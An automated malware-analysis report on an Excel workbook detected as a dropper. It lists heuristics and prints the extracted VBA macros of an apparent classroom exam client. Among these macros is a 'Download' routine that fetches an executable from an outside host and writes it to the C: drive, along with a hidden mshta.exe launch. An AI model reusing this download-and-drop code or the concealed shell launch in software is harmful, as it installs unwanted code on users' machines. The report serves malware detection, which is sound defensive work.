Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 ab73193dd1f250ae…

MALICIOUS

Office (OOXML)

124.1 KB Created: 2019-06-14 06:21:10 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2021-04-01
MD5: 61f9d9f8936cd4fb32b8cea608a9eee7 SHA-1: 4b37914596f6cb60710ea34aeee95f116806039e SHA-256: ab73193dd1f250aeaae35c68e27ad0b2c22a516eda2a27b330affad18c050913
422 Risk Score

Heuristics 8

  • ClamAV: Doc.Dropper.Agent-6412232-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6412232-1
  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
        CreateObject("WScript.Shell").Run "%systemroot%\syswow64\mshta.exe about:""about:<head><script>moveTo(-32000,-32000);document.title='x86Host'</script><hta:application showintaskbar=no /><object id='shell' classid='clsid:8856F961-340A-11D0-A96B-00C04FD705A2'><param name=RegisterAsBrowser value=1></object><script>shell.putproperty('" & sSignature & "',document.parentWindow);</script></head>""", 0, False
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
        CreateObject("WScript.Shell").Run "%systemroot%\syswow64\mshta.exe about:""about:<head><script>moveTo(-32000,-32000);document.title='x86Host'</script><hta:application showintaskbar=no /><object id='shell' classid='clsid:8856F961-340A-11D0-A96B-00C04FD705A2'><param name=RegisterAsBrowser value=1></object><script>shell.putproperty('" & sSignature & "',document.parentWindow);</script></head>""", 0, False
  • LOLBin reference in VBA critical OLE_VBA_LOLBIN
    LOLBin reference in VBA
    Matched line in script
        CreateObject("WScript.Shell").Run "%systemroot%\syswow64\mshta.exe about:""about:<head><script>moveTo(-32000,-32000);document.title='x86Host'</script><hta:application showintaskbar=no /><object id='shell' classid='clsid:8856F961-340A-11D0-A96B-00C04FD705A2'><param name=RegisterAsBrowser value=1></object><script>shell.putproperty('" & sSignature & "',document.parentWindow);</script></head>""", 0, False
  • VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script
        s.Write H.ResponseBody
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set H = CreateObject("Microsoft.XMLHTTP")
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.yt-e.com/a.exe Referenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 27935 bytes
SHA-256: a4a431708675c5a19d9a9697b52cd230a9a1183d2fb1a5d1ca5776835ed7c54b
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Sub Download()
    Dim H, s
    Set H = CreateObject("Microsoft.XMLHTTP")
    H.Open "GET", "http://www.yt-e.com/a.exe", False
    H.Send
    Set s = CreateObject("ADODB.Stream")
    s.Type = 1
    s.Open
    s.Write H.ResponseBody
    s.SaveToFile "c:\a.exe", 2
    s.Close
End Sub


Sub StartExam()
    StudentName = Range("C7").Value
    Studentid = Range("C10").Value
    StudentClass = Range("C13").Value
    ExamID = Range("C16").Value
    If StrComp(StudentName, "", 1) = 0 Then
        MsgBox "请输入正确的姓名!"
    ElseIf StrComp(Studentid, "", 1) = 0 Then
        MsgBox "请输入正确的学号!"
    ElseIf StrComp(StudentClass, "", 1) = 0 Then
        MsgBox "请输入正确的班级!"
    ElseIf StrComp(ExamID, "", 1) = 0 Then
        MsgBox "请输入正确的考试ID!"
    Else
        FlushExamInfo
        Status = Sheets("开始").Range("L19").Value
        If StrComp(Status, "无考试", 1) = 0 Then
            MsgBox "当前无考试"
        ElseIf StrComp(Status, "考试未开始", 1) = 0 Then
            MsgBox "当前考试未开始"
        ElseIf StrComp(Status, "考试结束", 1) = 0 Then
            MsgBox "当前考试已经结束"
        ElseIf StrComp(Status, "考试开始", 1) = 0 Then
            GetQuestion
            MsgBox "考题获取成功,开始考试!"
        End If
    End If
End Sub

Sub ConnectServer()
    IP = Sheets("开始").Range("C19").Value
    Url = "http://" & IP + "/connectTest"
    Dim xmlhttp As Object
    Set xmlhttp = CreateObject("MSXML2.XMLHTTP")
    xmlhttp.Open "POST", Url, False
    xmlhttp.SetRequestHeader "Content-Type", "application/x-www-from-urlencode;charset=UTF-8"
    xmlhttp.Send "test=test"
    Do While xmlhttp.readyState <> 4
        DoEvents
    Loop
    
    If xmlhttp.ResponseText = "success" Then
        MsgBox "连接考试服务器成功!"
    End If
    Set xmlhttp = Nothing
End Sub

Sub FlushExamInfo()
    IP = Sheets("开始").Range("C19").Value
    Url = "http://" & IP + "/GetInfo"
    Dim xmlhttp As Object
    Set xmlhttp = CreateObject("MSXML2.XMLHTTP")
    xmlhttp.Open "POST", Url, False
    xmlhttp.SetRequestHeader "Content-Type", "application/x-www-from-urlencode;charset=UTF-8"
    xmlhttp.Send "test=test"
    Do While xmlhttp.readyState <> 4
        DoEvents
    Loop
    
    Dim i As Integer
    temp = Split(xmlhttp.ResponseText, ",")
    For i = 0 To UBound(temp)
        temp1 = Split(temp(i), ":")
        Dim j As Integer
        For j = 0 To UBound(temp1)
            If StrComp(temp1(0), "{""name""", 1) = 0 Then
                Sheets("开始").Range("A1").Value = Replace(Replace(temp1(1), """", ""), "}", "")
            ElseIf StrComp(temp1(0), """state""", 1) = 0 Then
                Sheets("开始").Range("L19").Value = Replace(Replace(temp1(1), """", ""), "}", "")
            End If
        Next j
    Next i
End Sub

Sub CheckID()
    IP = Sheets("开始").Range("C19").Value
    Url = "http://" & IP + "/CheckStudent?"
    Url = Url & "id=" & Sheets("开始").Range("C10").Value
    Url = Url & "&test=" & Int((99999 * Rnd) + 1)
    Dim xmlhttp As Object
    Set xmlhttp = CreateObject("MSXML2.XMLHTTP")
    xmlhttp.Open "GET", Url, False
    xmlhttp.Send
    Do While xmlhttp.readyState <> 4
        DoEvents
    Loop
    
    temp = Split(xmlhttp.ResponseText, ":")
    MsgBox Replace(temp(1), "}", "")
    Set xmlhttp = Nothing
End Sub

Sub GetQuestion()
    '获取选择题
    Xuanze
    '获取填空题
    TianKong
    '获取判断题
    PanDuan
    '获取简单题
    JianDa
    '获取操作题
    CaoZuo
End Sub

Sub Xuanze()
    IP = Sheets("开始").Range("C19").Value
    Url = "http://" & IP + "/GetQuestion?"
    Url = Url & "&type=0"
    Url = Url & "&id=" & Sheets("开始").Range("C10").Value
    Url = Url & "&test=" & Int((99999 * Rnd) + 1)
    Dim xmlhttp As Object
    Set xmlhttp = CreateObject("MSXML2.XMLHTTP")
    xmlhttp.Open "GET", Url, False
    xmlhttp.Send
    Do While xmlhttp.readyState <> 4
        DoEvents
    Loop
    
    Set sc = CreateObjectx86("ScriptControl"): sc.Language = "JScript"
    sc.AddCode ("var query = " & xmlhttp.ResponseText)
    QuestionCount = sc.Eval("query.length")
    QuestionRow = 2
    For i = 0 To QuestionCount - 1
        QuestionNumber = sc.Eval("query[" & i & "].number")
        QuestionTitle = sc.Eval("query[" & i & "].title")
        QuestionChoice = sc.Eval("query[" & i & "].choice")
        Sheets("选择题").Range("A" & QuestionRow).Value = "选择题" & QuestionNumber
        Sheets("选择题").Range("B" & QuestionRow).Value = QuestionTitle
        QuestionRow = QuestionRow + 1
        Sheets("选择题").Range("B" & QuestionRow).Value = QuestionChoice
        QuestionRow = QuestionRow + 1
    Next i
End Sub

Sub TianKong()
    IP = Sheets("开始").Range("C19").Value
    Url = "http://" & IP + "/GetQuestion?"
    Url = Url & "&type=2"
    Url = Url & "&id=" & Sheets("开始").Range("C10").Value
    Url = Url & "&test=" & Int((99999 * Rnd) + 1)
    Dim xmlhttp As Object
    Set xmlhttp = CreateObject("MSXML2.XMLHTTP")
    xmlhttp.Open "GET", Url, False
    xmlhttp.Send
    Do While xmlhttp.readyState <> 4
        DoEvents
    Loop
    
    Set sc = CreateObjectx86("ScriptControl"): sc.Language = "JScript"
    sc.AddCode ("var query = " & xmlhttp.ResponseText)
    QuestionCount = sc.Eval("query.length")
    QuestionRow = 2
    For i = 0 To QuestionCount - 1
        QuestionNumber = sc.Eval("query[" & i & "].number")
        QuestionTitle = sc.Eval("query[" & i & "].title")
        Sheets("填空题").Range("A" & QuestionRow).Value = "填空题" & QuestionNumber
        Sheets("填空题").Range("B" & QuestionRow).Value = QuestionTitle
        QuestionRow = QuestionRow + 1
    Next i
End Sub

Sub PanDuan()
    IP = Sheets("开始").Range("C19").Value
    Url = "http://" & IP + "/GetQuestion?"
    Url = Url & "&type=1"
    Url = Url & "&id=" & Sheets("开始").Range("C10").Value
    Url = Url & "&test=" & Int((99999 * Rnd) + 1)
    Dim xmlhttp As Object
    Set xmlhttp = CreateObject("MSXML2.XMLHTTP")
    xmlhttp.Open "GET", Url, False
    xmlhttp.Send
    Do While xmlhttp.readyState <> 4
        DoEvents
    Loop
    
    Set sc = CreateObjectx86("ScriptControl"): sc.Language = "JScript"
    sc.AddCode ("var query = " & xmlhttp.ResponseText)
    QuestionCount = sc.Eval("query.length")
    QuestionRow = 2
    For i = 0 To QuestionCount - 1
        QuestionNumber = sc.Eval("query[" & i & "].number")
        QuestionTitle = sc.Eval("query[" & i & "].title")
        Sheets("判断题").Range("A" & QuestionRow).Value = "判断题" & QuestionNumber
        Sheets("判断题").Range("B" & QuestionRow).Value = QuestionTitle
        QuestionRow = QuestionRow + 1
    Next i
End Sub

Sub JianDa()
    IP = Sheets("开始").Range("C19").Value
    Url = "http://" & IP + "/GetQuestion?"
    Url = Url & "&type=3"
    Url = Url & "&id=" & Sheets("开始").Range("C10").Value
    Url = Url & "&test=" & Int((99999 * Rnd) + 1)
    Dim xmlhttp As Object
    Set xmlhttp = CreateObject("MSXML2.XMLHTTP")
    xmlhttp.Open "GET", Url, False
    xmlhttp.Send
    Do While xmlhttp.readyState <> 4
        DoEvents
    Loop
    
    Set sc = CreateObjectx86("ScriptControl"): sc.Language = "JScript"
    sc.AddCode ("var query = " & xmlhttp.ResponseText)
    QuestionCount = sc.Eval("query.length")
    QuestionRow = 2
    For i = 0 To QuestionCount - 1
        QuestionNumber = sc.Eval("query[" & i & "].number")
        QuestionTitle = sc.Eval("query[" & i & "].title")
        Sheets("简答题").Range("A" & QuestionRow).Value = "简答题" & QuestionNumber
        Sheets("简答题").Range("B" & QuestionRow).Value = QuestionTitle
        QuestionRow = QuestionRow + 1
    Next i
End Sub

Sub CaoZuo()
    IP = Sheets("开始").Range("C19").Value
    Url = "http://" & IP + "/GetQuestion?"
    Url = Url & "&type=4"
    Url = Url & "&id=" & Sheets("开始").Range("C10").Value
    Url = Url & "&test=" & Int((99999 * Rnd) + 1)
    Dim xmlhttp As Object
    Set xmlhttp = CreateObject("MSXML2.XMLHTTP")
    xmlhttp.Open "GET", Url, False
    xmlhttp.Send
    Do While xmlhttp.readyState <> 4
        DoEvents
    Loop
    
    Set sc = CreateObjectx86("ScriptControl"): sc.Language = "JScript"
    sc.AddCode ("var query = " & xmlhttp.ResponseText)
    QuestionCount = sc.Eval("query.length")
    QuestionRow = 2
    For i = 0 To QuestionCount - 1
        QuestionNumber = sc.Eval("query[" & i & "].number")
        QuestionTitle = sc.Eval("query[" & i & "].title")
        QuestionAsset = sc.Eval("query[" & i & "].answer")
        Sheets("操作题").Range("A" & QuestionRow).Value = "操作题" & QuestionNumber
        Sheets("操作题").Range("B" & QuestionRow).Value = QuestionTitle
        Sheets("操作题").Range("C" & QuestionRow).Value = QuestionAsset
        QuestionRow = QuestionRow + 1
        Dim H, s
        Set H = CreateObject("Microsoft.XMLHTTP")
        H.Open "GET", "http://" & IP + "/GetFile?file=" & QuestionAsset, False
        H.Send
        Set s = CreateObject("ADODB.Stream")
        s.Type = 1
        s.Open
        s.Write H.ResponseBody
        s.SaveToFile "d:\exam\" & QuestionAsset, 2
        s.Close
    Next i
End Sub

Sub SbmitExam()
    StudentName = Range("C7").Value
    Studentid = Range("C10").Value
    StudentClass = Range("C13").Value
    ExamID = Range("C16").Value
    If StrComp(StudentName, "", 1) = 0 Then
        MsgBox "请输入正确的姓名!"
    ElseIf StrComp(Studentid, "", 1) = 0 Then
        MsgBox "请输入正确的学号!"
    ElseIf StrComp(StudentClass, "", 1) = 0 Then
        MsgBox "请输入正确的班级!"
    ElseIf StrComp(ExamID, "", 1) = 0 Then
        MsgBox "请输入正确的考试ID!"
    Else
        FlushExamInfo
        Status = Sheets("开始").Range("L19").Value
        If StrComp(Status, "无考试", 1) = 0 Then
            MsgBox "当前无考试"
        ElseIf StrComp(Status, "考试未开始", 1) = 0 Then
            MsgBox "当前考试未开始"
        ElseIf StrComp(Status, "考试结束", 1) = 0 Then
            MsgBox "当前考试已经结束"
        ElseIf StrComp(Status, "考试开始", 1) = 0 Then
            'Sheets("开始").Visible = False
            CorrectXuanZe
            CorrectPanDuan
            CorrectTianKong
            CorrectJianDa
            MsgBox "试卷提交成功,现在你可以回到作答区查看错题情况!"
        End If
    End If
End Sub

Sub CorrectXuanZe()
    IP = Sheets("开始").Range("C19").Value
    Url = "http://" & IP + "/GetQuestion?"
    Url = Url & "&type=0"
    Url = Url & "&id=" & Sheets("开始").Range("C10").Value
    Url = Url & "&test=" & Int((99999 * Rnd) + 1)
    Dim xmlhttp As Object
    Set xmlhttp = CreateObject("MSXML2.XMLHTTP")
    xmlhttp.Open "GET", Url, False
    xmlhttp.Send
    Do While xmlhttp.readyState <> 4
        DoEvents
    Loop
    
    Set sc = CreateObjectx86("ScriptControl"): sc.Language = "JScript"
    sc.AddCode ("var query = " & xmlhttp.ResponseText)
    QuestionCount = sc.Eval("query.length")
    QuestionRow = 2
    StudentAnswerStr = ""
    RightCount = 0
    For i = 0 To QuestionCount - 1
        QuestionAnswer = sc.Eval("query[" & i & "].answer")
        StudentAnswer = Sheets("选择题").Range("C" & QuestionRow).Value
        If i = 0 Then
            StudentAnswerStr = StudentAnswer
        Else
            StudentAnswerStr = StudentAnswerStr + "|@|" + StudentAnswer
        End If
        If StrComp(QuestionAnswer, StudentAnswer, 1) = 0 Then
            RightCount = RightCount + 1
            Sheets("选择题").Range("C" & QuestionRow).Interior.Color = 5287936
        Else
            Sheets("选择题").Range("C" & QuestionRow).Interior.Color = 65535
        End If
        QuestionRow = QuestionRow + 2
    Next i
    
    Url1 = "http://" & IP & "/SetAnswer?"
    Url1 = Url1 & "&type=0"
    Url1 = Url1 & "&id=" & Sheets("开始").Range("C10").Value
    Url1 = Url1 & "&answer=" & StudentAnswerStr
    Url1 = Url1 & "&mark=" & RightCount
    Url1 = Url1 & "&test=" & Int((99999 * Rnd) + 1)
    Set xmlhttp1 = CreateObject("MSXML2.XMLHTTP")
    xmlhttp1.Open "GET", Url1, False
    xmlhttp1.Send
    Do While xmlhttp1.readyState <> 4
        DoEvents
    Loop
End Sub

Sub CorrectPanDuan()
    IP = Sheets("开始").Range("C19").Value
    Url = "http://" & IP + "/GetQuestion?"
    Url = Url & "&type=1"
    Url = Url & "&id=" & Sheets("开始").Range("C10").Value
    Url = Url & "&test=" & Int((99999 * Rnd) + 1)
    Dim xmlhttp As Object
    Set xmlhttp = CreateObject("MSXML2.XMLHTTP")
    xmlhttp.Open "GET", Url, False
    xmlhttp.Send
    Do While xmlhttp.readyState <> 4
        DoEvents
    Loop
    
    Set sc = CreateObjectx86("ScriptControl"): sc.Language = "JScript"
    sc.AddCode ("var query = " & xmlhttp.ResponseText)
    QuestionCount = sc.Eval("query.length")
    QuestionRow = 2
    StudentAnswerStr = ""
    RightCount = 0
    For i = 0 To QuestionCount - 1
        QuestionAnswer = sc.Eval("query[" & i & "].answer")
        StudentAnswer = Sheets("判断题").Range("C" & QuestionRow).Value
        If i = 0 Then
            StudentAnswerStr = StudentAnswer
        Else
            StudentAnswerStr = StudentAnswerStr + "|@|" + StudentAnswer
        End If
        If StrComp(QuestionAnswer, StudentAnswer, 1) = 0 Then
            RightCount = RightCount + 1
            Sheets("判断题").Range("C" & QuestionRow).Interior.Color = 5287936
        Else
            Sheets("判断题").Range("C" & QuestionRow).Interior.Color = 65535
        End If
        QuestionRow = QuestionRow + 1
    Next i
    
    Url1 = "http://" & IP & "/SetAnswer?"
    Url1 = Url1 & "&type=1"
    Url1 = Url1 & "&id=" & Sheets("开始").Range("C10").Value
    Url1 = Url1 & "&answer=" & StudentAnswerStr
    Url1 = Url1 & "&mark=" & RightCount
    Url1 = Url1 & "&test=" & Int((99999 * Rnd) + 1)
    Set xmlhttp1 = CreateObject("MSXML2.XMLHTTP")
    xmlhttp1.Open "GET", Url1, False
    xmlhttp1.Send
    Do While xmlhttp1.readyState <> 4
        DoEvents
    Loop
End Sub

Sub CorrectTianKong()
    IP = Sheets("开始").Range("C19").Value
    Url = "http://" & IP + "/GetQuestion?"
    Url = Url & "&type=2"
    Url = Url & "&id=" & Sheets("开始").Range("C10").Value
    Url = Url & "&test=" & Int((99999 * Rnd) + 1)
    Dim xmlhttp As Object
    Set xmlhttp = CreateObject("MSXML2.XMLHTTP")
    xmlhttp.Open "GET", Url, False
    xmlhttp.Send
    Do While xmlhttp.readyState <> 4
        DoEvents
    Loop
    
    Set sc = CreateObjectx86("ScriptControl"): sc.Language = "JScript"
    sc.AddCode ("var query = " & xmlhttp.ResponseText)
    QuestionCount = sc.Eval("query.length")
    QuestionRow = 2
    StudentAnswerStr = ""
    RightCount = 0
    For i = 0 To QuestionCount - 1
        QuestionAnswer = sc.Eval("query[" & i & "].answer")
        StudentAnswer = Sheets("填空题").Range("C" & QuestionRow).Value
        If i = 0 Then
            StudentAnswerStr = StudentAnswer
        Else
            StudentAnswerStr = StudentAnswerStr + "|@|" + StudentAnswer
        End If
        If StrComp(QuestionAnswer, StudentAnswer, 1) = 0 Then
            RightCount = RightCount + 1
            Sheets("填空题").Range("C" & QuestionRow).Interior.Color = 5287936
        Else
            Sheets("填空题").Range("C" & QuestionRow).Interior.Color = 65535
        End If
        QuestionRow = QuestionRow + 1
    Next i
    
    Url1 = "http://" & IP & "/SetAnswer?"
    Url1 = Url1 & "&type=2"
    Url1 = Url1 & "&id=" & Sheets("开始").Range("C10").Value
    Url1 = Url1 & "&answer=" & StudentAnswerStr
    Url1 = Url1 & "&mark=" & RightCount
    Url1 = Url1 & "&test=" & Int((99999 * Rnd) + 1)
    Set xmlhttp1 = CreateObject("MSXML2.XMLHTTP")
    xmlhttp1.Open "GET", Url1, False
    xmlhttp1.Send
    Do While xmlhttp1.readyState <> 4
        DoEvents
    Loop
End Sub

Sub CorrectJianDa()
    IP = Sheets("开始").Range("C19").Value
    Url = "http://" & IP + "/GetQuestion?"
    Url = Url & "&type=3"
    Url = Url & "&id=" & Sheets("开始").Range("C10").Value
    Url = Url & "&test=" & Int((99999 * Rnd) + 1)
    Dim xmlhttp As Object
    Set xmlhttp = CreateObject("MSXML2.XMLHTTP")
    xmlhttp.Open "GET", Url, False
    xmlhttp.Send
    Do While xmlhttp.readyState <> 4
        DoEvents
    Loop
    
    Set sc = CreateObjectx86("ScriptControl"): sc.Language = "JScript"
    sc.AddCode ("var query = " & xmlhttp.ResponseText)
    QuestionCount = sc.Eval("query.length")
    QuestionRow = 2
    StudentAnswerStr = ""
    For i = 0 To QuestionCount - 1
        QuestionAnswer = sc.Eval("query[" & i & "].answer")
        StudentAnswer = Sheets("简答题").Range("C" & QuestionRow).Value
        If i = 0 Then
            StudentAnswerStr = StudentAnswer
        Else
            StudentAnswerStr = StudentAnswerStr + "|@|" + StudentAnswer
        End If
        QuestionRow = QuestionRow + 1
    Next i
    
    Url1 = "http://" & IP & "/SetAnswer?"
    Url1 = Url1 & "&type=3"
    Url1 = Url1 & "&id=" & Sheets("开始").Range("C10").Value
    Url1 = Url1 & "&answer=" & StudentAnswerStr
    Url1 = Url1 & "&mark=-1"
    Url1 = Url1 & "&test=" & Int((99999 * Rnd) + 1)
    Set xmlhttp1 = CreateObject("MSXML2.XMLHTTP")
    xmlhttp1.Open "GET", Url1, False
    xmlhttp1.Send
    Do While xmlhttp1.readyState <> 4
        DoEvents
    Loop
End Sub

Function CreateObjectx86(Optional sProgID, Optional bClose = False)
    Static oWnd As Object
    Dim bRunning As Boolean
    #If Win64 Then
        bRunning = InStr(TypeName(oWnd), "HTMLWindow") > 0
        If bClose Then
            If bRunning Then oWnd.Close
            Exit Function
        End If
        If Not bRunning Then
            Set oWnd = CreateWindow()
            oWnd.execScript "Function CreateObjectx86(sProgID): Set CreateObjectx86 = CreateObject(sProgID): End Function", "VBScript"
        End If
        Set CreateObjectx86 = oWnd.CreateObjectx86(sProgID)
    #Else
        Set CreateObjectx86 = CreateObject("MSScriptControl.ScriptControl")
    #End If
End Function


Function CreateWindow()
    Dim sSignature, oShellWnd, oProc
    On Error Resume Next
    sSignature = Left(CreateObject("Scriptlet.TypeLib").GUID, 38)
    CreateObject("WScript.Shell").Run "%systemroot%\syswow64\mshta.exe about:""about:<head><script>moveTo(-32000,-32000);document.title='x86Host'</script><hta:application showintaskbar=no /><object id='shell' classid='clsid:8856F961-340A-11D0-A96B-00C04FD705A2'><param name=RegisterAsBrowser value=1></object><script>shell.putproperty('" & sSignature & "',document.parentWindow);</script></head>""", 0, False
    Do
        For Each oShellWnd In CreateObject("Shell.Application").Windows
            Set CreateWindow = oShellWnd.GetProperty(sSignature)
            If Err.Number = 0 Then Exit Function
            Err.Clear
        Next
    Loop
End Function

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet4"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet5"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet6"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub Upload()
    IP = Sheets("开始").Range("C19").Value
    CreateObject("wscript.shell").Run "http://" & IP + "/Upload"
End Sub

Attribute VB_Name = "Sheet7"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub SetExam()
    IP = Sheets("开始").Range("C19").Value
    Url = "http://" & IP + "/NewExam?"
    Url = Url & "name=" & Sheets("教师端").Range("E6").Value
    Url = Url & "&start=" & Sheets("教师端").Range("I8").Value
    Url = Url & "&end=" & Sheets("教师端").Range("I10").Value
    Url = Url & "&count0=" & Sheets("教师端").Range("E12").Value
    Url = Url & "&count1=" & Sheets("教师端").Range("E14").Value
    Url = Url & "&count2=" & Sheets("教师端").Range("E16").Value
    Url = Url & "&count3=" & Sheets("教师端").Range("E18").Value
    Url = Url & "&count4=" & Sheets("教师端").Range("E20").Value
    Url = Url & "&test=" & Int((99999 * Rnd) + 1)
    Dim xmlhttp As Object
    Set xmlhttp = CreateObject("MSXML2.XMLHTTP")
    xmlhttp.Open "GET", Url, False
    xmlhttp.Send
    Do While xmlhttp.readyState <> 4
        DoEvents
    Loop
    
    temp = Split(xmlhttp.ResponseText, ":")
    MsgBox Replace(temp(1), "}", "")
    Set xmlhttp = Nothing
End Sub

Sub DelExam()
    IP = Sheets("开始").Range("C19").Value
    Url = "http://" & IP + "/DelExam?"
    Url = Url & "&test=" & Int((99999 * Rnd) + 1)
    Dim xmlhttp As Object
    Set xmlhttp = CreateObject("MSXML2.XMLHTTP")
    xmlhttp.Open "GET", Url, False
    xmlhttp.Send
    Do While xmlhttp.readyState <> 4
        DoEvents
    Loop
    
    temp = Split(xmlhttp.ResponseText, ":")
    MsgBox Replace(temp(1), "}", "")
    Set xmlhttp = Nothing
End Sub

Sub Test()
    Sheets("开始").Visible = True
End Sub

Sub GetAllMark()
    IP = Sheets("开始").Range("C19").Value
    Url = "http://" & IP + "/GetAllMark?"
    Url = Url & "&test=" & Int((99999 * Rnd) + 1)
    Dim xmlhttp As Object
    Set xmlhttp = CreateObject("MSXML2.XMLHTTP")
    xmlhttp.Open "GET", Url, False
    xmlhttp.Send
    Do While xmlhttp.readyState <> 4
        DoEvents
    Loop
    
    Set sc = CreateObjectx86("ScriptControl"): sc.Language = "JScript"
    sc.AddCode ("var query = " & xmlhttp.ResponseText)
    QuestionCount = sc.Eval("query.length")
    QuestionRow = 2
    For i = 0 To QuestionCount - 1
        StudentName = sc.Eval("query[" & i & "].name")
        Studentid = sc.Eval("query[" & i & "].id")
        Studentchoice = sc.Eval("query[" & i & "].choice")
        Studentjudgment = sc.Eval("query[" & i & "].judgment")
        Studentcompletion = sc.Eval("query[" & i & "].completion")
        Sheets("教师端").Range("M" & QuestionRow).Value = StudentName
        Sheets("教师端").Range("N" & QuestionRow).Value = Studentid
        Sheets("教师端").Range("O" & QuestionRow).Value = Studentchoice * Sheets("教师端").Range("I12").Value
        Sheets("教师端").Range("P" & QuestionRow).Value = Studentjudgment * Sheets("教师端").Range("I14").Value
        Sheets("教师端").Range("Q" & QuestionRow).Value = Studentcompletion * Sheets("教师端").Range("I16").Value
        QuestionRow = QuestionRow + 1
    Next i
End Sub

Sub GetAllAnswer()
    IP = Sheets("开始").Range("C19").Value
    CreateObject("wscript.shell").Run "http://" & IP + "/Download?msg=All"
End Sub

Sub GetAllCheat()
    IP = Sheets("开始").Range("C19").Value
    Url = "http://" & IP + "/GetCheat?"
    Url = Url & "&test=" & Int((99999 * Rnd) + 1)
    Dim xmlhttp As Object
    Set xmlhttp = CreateObject("MSXML2.XMLHTTP")
    xmlhttp.Open "GET", Url, False
    xmlhttp.Send
    Do While xmlhttp.readyState <> 4
        DoEvents
    Loop
    
    Set sc = CreateObjectx86("ScriptControl"): sc.Language = "JScript"
    sc.AddCode ("var query = " & xmlhttp.ResponseText)
    QuestionCount = sc.Eval("query.length")
    QuestionRow = 39
    For i = 0 To QuestionCount - 1
        StudentName = sc.Eval("query[" & i & "].name")
        Studentid = sc.Eval("query[" & i & "].id")
        cheat1 = sc.Eval("query[" & i & "].cheat1")
        cheat2 = sc.Eval("query[" & i & "].cheat2")
        cheat3 = sc.Eval("query[" & i & "].cheat3")
        Sheets("教师端").Range("B" & QuestionRow).Value = StudentName
        Sheets("教师端").Range("C" & QuestionRow).Value = Studentid
        Sheets("教师端").Range("D" & QuestionRow).Value = cheat1
        Sheets("教师端").Range("E" & QuestionRow).Value = cheat2
        Sheets("教师端").Range("F" & QuestionRow).Value = cheat3
        QuestionRow = QuestionRow + 1
    Next i
End Sub

Function CreateObjectx86(Optional sProgID, Optional bClose = False)
    Static oWnd As Object
    Dim bRunning As Boolean
    #If Win64 Then
        bRunning = InStr(TypeName(oWnd), "HTMLWindow") > 0
        If bClose Then
            If bRunning Then oWnd.Close
            Exit Function
        End If
        If Not bRunning Then
            Set oWnd = CreateWindow()
            oWnd.execScript "Function CreateObjectx86(sProgID): Set CreateObjectx86 = CreateObject(sProgID): End Function", "VBScript"
        End If
        Set CreateObjectx86 = oWnd.CreateObjectx86(sProgID)
    #Else
        Set CreateObjectx86 = CreateObject("MSScriptControl.ScriptControl")
    #End If
End Function


Function CreateWindow()
    Dim sSignature, oShellWnd, oProc
    On Error Resume Next
    sSignature = Left(CreateObject("Scriptlet.TypeLib").GUID, 38)
    CreateObject("WScript.Shell").Run "%systemroot%\syswow64\mshta.exe about:""about:<head><script>moveTo(-32000,-32000);document.title='x86Host'</script><hta:application showintaskbar=no /><object id='shell' classid='clsid:8856F961-340A-11D0-A96B-00C04FD705A2'><param name=RegisterAsBrowser value=1></object><script>shell.putproperty('" & sSignature & "',document.parentWindow);</script></head>""", 0, False
    Do
        For Each oShellWnd In CreateObject("Shell.Application").Windows
            Set CreateWindow = oShellWnd.GetProperty(sSignature)
            If Err.Number = 0 Then Exit Function
            Err.Clear
        Next
